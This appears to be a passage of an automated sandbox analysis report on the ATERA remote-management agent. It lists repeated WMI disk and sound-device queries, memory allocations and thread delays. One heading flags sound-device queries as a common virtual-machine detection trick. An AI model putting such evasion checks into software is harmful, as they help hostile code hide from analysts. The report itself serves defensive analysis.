Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 21679630000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 2167AF90000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 1A571170000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 1A571670000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 28A555B0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 28A6DC40000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 20593620000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 205ABBA0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 25179C40000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Memory allocated: 25179EA0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 150BEBB0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 150D7220000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Memory allocated: 23071B70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Memory allocated: 230723B0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 247F7BB0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 247F8170000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 1C2EAFC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 1C2EB650000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 1F14A4E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Memory allocated: 1F162C60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Memory allocated: 19F9BC20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Memory allocated: 19FB3EC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Memory allocated: 28A19350000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Memory allocated: 28A31920000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Memory allocated: 21F24F70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Memory allocated: 21F3D670000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 256F0810000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Memory allocated: 256F0960000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Memory allocated: 11CB2640000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Memory allocated: 11CCAE40000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Memory allocated: 2A332670000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Memory allocated: 2A34AE20000 memory reserve \| memory write watch

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599547
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599437
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599328
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599218
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599109
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598986
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598873
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598765
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598650
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598547
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598437
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598325
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598218
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598109
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597999
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597890
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597671
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596905
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596796
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596572
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596359
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596249
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596140
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596031
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595922
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595812
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 595703
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599890
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599672
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 599015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598795
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598359
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598250
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598138
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 598031
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597909
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597671
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597452
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 597015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596797
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596678
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 596015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595906
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595797
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595462
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595358
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595248
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595117
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 595015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594905
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594796
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594687
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594577
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Thread delayed: delay time: 594468
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599813
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599688
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599553
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599416
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599306
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599188
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 599078
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598966
